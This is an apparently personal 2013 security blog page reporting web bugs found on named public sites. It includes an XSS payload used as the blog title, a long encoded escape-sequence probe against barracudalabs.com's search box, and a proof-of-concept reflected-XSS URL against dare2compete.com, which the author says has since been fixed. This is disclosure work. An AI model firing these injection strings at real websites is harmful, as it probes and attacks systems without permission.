"><img src= x onerror=prompt(1)>
kathuriaranjan
Thursday, 14 November 2013
Sunday, 10 November 2013
Escape Seq in barracudalabs.com @search box
Found escape seq bug in barracudalabs,!!
Given any escape seq in search box the state of input will automatically changed.!!
http://barracudalabs.com/?s=%3C+%253C+%26lt+%26lt%3B+%26LT+%26LT%3B+%26%2360+%26%23060+%26%230060+%26%2300060+%26%23000060+%26%230000060+%26%2360%3B+%26%23060%3B+%26%230060%3B+%26%2300060%3B+%26%23000060%3B+%26%230000060%3B+%26%23x3c+%26%23x03c+%26%23x003c+%26%23x0003c+%26%23x00003c+%26%23x000003c+%26%23x3c%3B+%26%23x03c%3B+%26%23x003c%3B+%26%23x0003c%3B+%26%23x00003c%3B+%26%23x000003c%3B+%26%23X3c+%26%23X03c+%26%23X003c+%26%23X0003c+%26%23X00003c+%26%23X000003c+%26%23X3c%3B+%26%23X03c%3B+%26%23X003c%3B+%26%23X0003c%3B+%26%23X00003c%3B+%26%23X000003c%3B+%26%23x3C+%26%23x03C+%26%23x003C+%26%23x0003C+%26%23x00003C+%26%23x000003C+%26%23x3C%3B+%26%23x03C%3B+%26%23x003C%3B+%26%23x0003C%3B+%26%23x00003C%3B+%26%23x000003C%3B+%26%23X3C+%26%23X03C+%26%23X003C+%26%23X0003C+%26%23X00003C+%26%23X000003C+%26%23X3C%3B+%26%23X03C%3B+%26%23X003C%3B+%26%23X0003C%3B+%26%23X00003C%3B+%26%23X000003C%3B+\x3c+\x3C+\u003c+\u003C&x=0&y=0
Given any escape seq in search box the state of input will automatically changed.!!
http://barracudalabs.com/?s=%3C+%253C+%26lt+%26lt%3B+%26LT+%26LT%3B+%26%2360+%26%23060+%26%230060+%26%2300060+%26%23000060+%26%230000060+%26%2360%3B+%26%23060%3B+%26%230060%3B+%26%2300060%3B+%26%23000060%3B+%26%230000060%3B+%26%23x3c+%26%23x03c+%26%23x003c+%26%23x0003c+%26%23x00003c+%26%23x000003c+%26%23x3c%3B+%26%23x03c%3B+%26%23x003c%3B+%26%23x0003c%3B+%26%23x00003c%3B+%26%23x000003c%3B+%26%23X3c+%26%23X03c+%26%23X003c+%26%23X0003c+%26%23X00003c+%26%23X000003c+%26%23X3c%3B+%26%23X03c%3B+%26%23X003c%3B+%26%23X0003c%3B+%26%23X00003c%3B+%26%23X000003c%3B+%26%23x3C+%26%23x03C+%26%23x003C+%26%23x0003C+%26%23x00003C+%26%23x000003C+%26%23x3C%3B+%26%23x03C%3B+%26%23x003C%3B+%26%23x0003C%3B+%26%23x00003C%3B+%26%23x000003C%3B+%26%23X3C+%26%23X03C+%26%23X003C+%26%23X0003C+%26%23X00003C+%26%23X000003C+%26%23X3C%3B+%26%23X03C%3B+%26%23X003C%3B+%26%23X0003C%3B+%26%23X00003C%3B+%26%23X000003C%3B+\x3c+\x3C+\u003c+\u003C&x=0&y=0
xss @search box in dare2compete.com
Given any scripting string in search box of the above mentioned website, xss will be there..!!http://www.dare2compete.com/search/keywords/%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%281%29%3E
Now the bug is fixed according to dare2compete security team :)
Subscribe to:
Posts (Atom)